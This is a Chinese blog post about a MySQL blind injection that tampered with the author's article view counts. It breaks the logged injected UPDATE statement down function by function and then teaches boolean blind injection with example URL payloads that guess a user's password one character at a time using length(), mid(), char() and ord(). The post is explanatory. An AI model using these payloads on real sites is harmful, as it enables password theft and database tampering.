遭遇一次MySQL猜解注入攻击

作者：拍友2702932701 | 来源：互联网 | 2018-06-10 10:43

前些日子数据库被入侵，文章的阅读数都被纂改了，还好及时发现并做好备份。查一下MySQL语句记录，发现这么原来是这么一句SQL在捣鬼：UPDATEtableSETviews1WHEREid-2441OR(ORD(MID((SELECTIFNULL(CAST(FirstNameASCHAR),0x20)FROMus

前些日子数据库被入侵，文章的阅读数都被纂改了，还好及时发现并做好备份。查一下 MySQL 语句记录，发现这么原来是这么一句 SQL 在捣鬼： UPDATE table SET views = '1' WHERE id = -2441 OR (ORD(MID((SELECT IFNULL(CAST(FirstName AS CHAR),0x20) FROM us

前些日子数据库被入侵，文章的阅读数都被纂改了，还好及时发现并做好备份。查一下 MySQL 语句记录，发现这么原来是这么一句 SQL 在捣鬼：

UPDATE table SET views = '1' WHERE id = -2441 OR (ORD(MID((SELECT IFNULL(CAST(FirstName AS CHAR),0x20) FROM user ORDER BY id LIMIT 1,1),2,1))>112)#

PS：user 这个表是数据库里一个以前测试用的表，表的结构也写到博文里面，暴露了字段。

这句 SQL 为什么能那么厉害呢？我们接下来分析一下。

1. 首先是 CAST(FirstName AS CHAR) 这个子句。MySQL 的 CAST() 函数可用来获取一个类型的值，并产生另一个类型的值。具体的使用可以参看 MySQL CAST与CONVERT 函数的用法这篇文章。我们执行一下，看看结果是什么：

mysql> SELECT CAST(FirstName AS CHAR) FROM user;
+-------------------------+
| CAST(FirstName AS CHAR) |
+-------------------------+
| Gonn                    |
| Mio                     |
| Google                  |
| yale                    |
+-------------------------+
4 rows in set

就是将 FirstName 这个字段全部转成 CHAR 类型。

2. 接下来我们再看 IFNULL(CAST(FirstName AS CHAR),0x20) 这个子句的作用。IFNULL 用法：IFNULL(expr1,expr2)，如果 expr1 不是 NULL，IFNULL() 返回 expr1，否则它返回 expr2。具体可以参看《MySQL IFNULL()函数用法》。

执行一下：

mysql> SELECT IFNULL(CAST(FirstName AS CHAR),0x20) FROM user;
+--------------------------------------+
| IFNULL(CAST(FirstName AS CHAR),0x20) |
+--------------------------------------+
| Gonn                                 |
| Mio                                  |
| Google                               |
| yale                                 |
+--------------------------------------+
4 rows in set

虽然看起来结果没啥不同，但是，它起到了一个作用。假设 CAST 转换成 CHAR 失败，它就会返回 0x20 这个值，为后面的 ORD 提供作用。

3. 接下来再看 MID((SELECT IFNULL(CAST(FirstName AS CHAR),0x20) FROM user ORDER BY id LIMIT 1,1),2,1) 这个子句。MID() 这个函数就是截取字符串用的，具体可以看看《MySQL MID()函数用法》这个。

mysql> SELECT MID((SELECT IFNULL(CAST(FirstName AS CHAR),0x20) FROM user ORDER BY id LIMIT 1,1),2,1);
+----------------------------------------------------------------------------------------+
| MID((SELECT IFNULL(CAST(FirstName AS CHAR),0x20) FROM user ORDER BY id LIMIT 1,1),2,1) |
+----------------------------------------------------------------------------------------+
| i                                                                                      |
+----------------------------------------------------------------------------------------+
1 row in set

就得到一个字母 i。

4. 关键的子句来了：ORD(MID((SELECT IFNULL(CAST(FirstName AS CHAR),0x20) FROM user ORDER BY id LIMIT 1,1),2,1))。ORD() 函数返回字符串第一个字符的 ASCII 值，《《MySQL ORD()函数用法》》。

mysql> SELECT ORD(MID((SELECT IFNULL(CAST(FirstName AS CHAR),0x20) FROM user ORDER BY id LIMIT 1,1),2,1));
+---------------------------------------------------------------------------------------------+
| ORD(MID((SELECT IFNULL(CAST(FirstName AS CHAR),0x20) FROM user ORDER BY id LIMIT 1,1),2,1)) |
+---------------------------------------------------------------------------------------------+
|                                                                                         105 |
+---------------------------------------------------------------------------------------------+
1 row in set

就是 i 的 ASCII 码是105.

如果是失败，返回 0x20 这种情况：

mysql> SELECT ORD('0x20');
+-------------+
| ORD('0x20') |
+-------------+
|          48 |
+-------------+
1 row in set

两种情况，在 ASCII 码中都要比 112 前，就是下面的 hack 语句是可以执行的。

UPDATE table SET views = '1' WHERE id = -2441 OR (ORD(MID((SELECT IFNULL(CAST(FirstName AS CHAR),0x20) FROM nowamagic.`tb2` ORDER BY id LIMIT 1,1),2,1))>112)#

MySQL 猜解注入

在 MySQL 中内置了很多函数，利用它们，即使在没有联合查询功能的老版本 MySQL 上也可以做一些意想不到的操作。假设网站存在于http://www.nm.net/，我们想知道用户ID等于10的用户的密码，那么首先进行如下请求：

http://www.nm.net/index.php?id=10 and length(password)=12#

我们通过 length() 函数以及是否正确返回正常页面来确定用户密码的长度，这里我们猜解的是12位，注意数字后要有一个#号。接下来用mid()和char()暴力猜解口令的每一个字符，如果猜对了则页面返回正常：

http://www.nm.net/index.php?id=10 and mid(password,1,1)=char(0x60)#

Mid()函数原型是“Mid(str,pos,len)”，也可以用substring()函数。Char()函数的参数是ASCII值，在0～255之间，一个遍历过去就可以完成破解。

另外还可以用between()函数先判断这个字符是数字还是字母，缩小范围，加快暴力破解的速度。例如要判断字符是否是小写字母还可以用如下请求：

http://www.nm.net/index.php?id=10 and (mid(password,1,1)) between char(0x61) and char(0x7A)#

除了char()函数，还可以用ord函数来进行猜解。Ord函数可以得到字符的ASCII值，所以它也能实现类似的功能：

http://www.nm.net/index.php?id=10 and ord(mid(password,1,1))=0x6D#

用ord函数的另一个好处就是可以使用大于小于这种运算符来确定字符的范围：

http://www.nm.net/index.php?id=10 and ord(mid(password,1,1))>0x41#

就这样慢慢一步步手工猜解注入。

推荐阅读

io
Android 新闻App的本地服务器搭建教程

本文介绍了在开发Android新闻App时，搭建本地服务器的步骤。通过使用XAMPP软件，可以一键式搭建起开发环境，包括Apache、MySQL、PHP、PERL。在本地服务器上新建数据库和表，并设置相应的属性。最后，给出了创建new表的SQL语句。这个教程适合初学者参考。 ... [详细]

蜡笔小新 2023-12-14 17:15:19
io
如何限制php数据库链接数和连接超时时间？

本文介绍了如何使用php限制数据库插入的条数并显示每次插入数据库之间的数据数目，以及避免重复提交的方法。同时还介绍了如何限制某一个数据库用户的并发连接数，以及设置数据库的连接数和连接超时时间的方法。最后提供了一些关于浏览器在线用户数和数据库连接数量比例的参考值。 ... [详细]

蜡笔小新 2023-12-14 14:06:10
const
Hibernate基础映射

在说Hibernate映射前，我们先来了解下对象关系映射ORM。ORM的实现思想就是将关系数据库中表的数据映射成对象，以对象的形式展现。这样开发人员就可以把对数据库的操作转化为对 ... [详细]

蜡笔小新 2023-12-14 10:57:47
const
PHP中的MySQL函数库及其常用函数介绍

本文由编程笔记小编整理，介绍了PHP中的MySQL函数库及其常用函数，包括mysql_connect、mysql_error、mysql_select_db、mysql_query、mysql_affected_row、mysql_close等。希望对读者有一定的参考价值。 ... [详细]

蜡笔小新 2023-12-14 08:19:53
sum
Oracle分析函数first_value()和last_value()的用法及原理

本文介绍了Oracle分析函数first_value()和last_value()的用法和原理，以及在查询销售记录日期和部门中的应用。通过示例和解释，详细说明了first_value()和last_value()的功能和不同之处。同时，对于last_value()的结果出现不一样的情况进行了解释，并提供了理解last_value()默认统计范围的方法。该文对于使用Oracle分析函数的开发人员和数据库管理员具有参考价值。 ... [详细]

蜡笔小新 2023-12-13 19:07:23
sum
如何在php中将mysql查询结果赋值给变量

本文介绍了在php中将mysql查询结果赋值给变量的方法，包括从mysql表中查询count(学号)并赋值给一个变量，以及如何将sql中查询单条结果赋值给php页面的一个变量。同时还讨论了php调用mysql查询结果到变量的方法，并提供了示例代码。 ... [详细]

蜡笔小新 2023-12-12 18:22:57
sum
推荐一个ASP的内容管理框架（ASP Nuke）的优势和适用场景

本文推荐了一个ASP的内容管理框架ASP Nuke，并介绍了其主要功能和特点。ASP Nuke支持文章新闻管理、投票、论坛等主要内容，并可以自定义模块。最新版本为0.8，虽然目前仍处于Alpha状态，但作者表示会继续更新完善。文章还分析了使用ASP的原因，包括ASP相对较小、易于部署和较简单等优势，适用于建立门户、网站的组织和小公司等场景。 ... [详细]

蜡笔小新 2023-12-14 18:11:11
io
如何在MySQL中将零值替换为先前的非零值？

本文介绍了如何在MySQL中将零值替换为先前的非零值的方法，包括使用内联查询和更新查询。同时还提供了选择正确值的方法。 ... [详细]

蜡笔小新 2023-12-14 16:59:24
io
postman测试登录后的接口_使用postman进行接口测试的方法(测试用户管理模块)

本文介绍了使用postman进行接口测试的方法，以测试用户管理模块为例。首先需要下载并安装postman，然后创建基本的请求并填写用户名密码进行登录测试。接下来可以进行用户查询和新增的测试。在新增时，可以进行异常测试，包括用户名超长和输入特殊字符的情况。通过测试发现后台没有对参数长度和特殊字符进行检查和过滤。 ... [详细]

蜡笔小新 2023-12-14 10:29:45
byte
Oracle中tnsnames.ora的作用和配置方法

本文介绍了Oracle数据库中tnsnames.ora文件的作用和配置方法。tnsnames.ora文件在数据库启动过程中会被读取，用于解析LOCAL_LISTENER，并且与侦听无关。文章还提供了配置LOCAL_LISTENER和1522端口的示例，并展示了listener.ora文件的内容。 ... [详细]

蜡笔小新 2023-12-14 07:44:06
byte
MACElasticsearch安装步骤及验证方法

本文介绍了MACElasticsearch的安装步骤，包括下载ZIP文件、解压到安装目录、启动服务，并提供了验证启动是否成功的方法。同时，还介绍了安装elasticsearch-head插件的方法，以便于进行查询操作。 ... [详细]

蜡笔小新 2023-12-13 23:42:43
io
Golang如何使用Cookie跟踪位置

关键词：Golang, Cookie, 跟踪位置, net/http/cookiejar, package main, golang.org/x/net/publicsuffix, io/ioutil, log, net/http, net/http/cookiejar ... [详细]

蜡笔小新 2023-12-13 15:47:22
sum
VB.NET在线急等问题解决方法，如何统计数据库字段下的数据并显示在文本框里？

本文介绍了一个在线急等问题解决方法，即如何统计数据库中某个字段下的所有数据，并将结果显示在文本框里。作者提到了自己是一个菜鸟，希望能够得到帮助。作者使用的是ACCESS数据库，并且给出了一个例子，希望得到的结果是560。作者还提到自己已经尝试了使用"select sum(字段2) from 表名"的语句，得到的结果是650，但不知道如何得到560。希望能够得到解决方案。 ... [详细]

蜡笔小新 2023-12-13 15:15:30
io
高质量SQL书写的30条建议

本文提供了30条关于优化SQL的建议，包括避免使用select *，使用具体字段，以及使用limit 1等。这些建议是基于实际开发经验总结出来的，旨在帮助读者优化SQL查询。 ... [详细]

蜡笔小新 2023-12-13 13:24:33
spring
r2dbc配置多数据源

R2dbc配置多数据源问题根据官网配置r2dbc连接mysql多数据源所遇到的问题pom配置可以参考官网,不过我这样配置会报错我并没有这样配置将以下内容添加到pom.xml文件d ... [详细]

蜡笔小新 2023-12-12 16:38:53

拍友2702932701

这个家伙很懒，什么也没留下！

Tags | 热门标签

RankList | 热门文章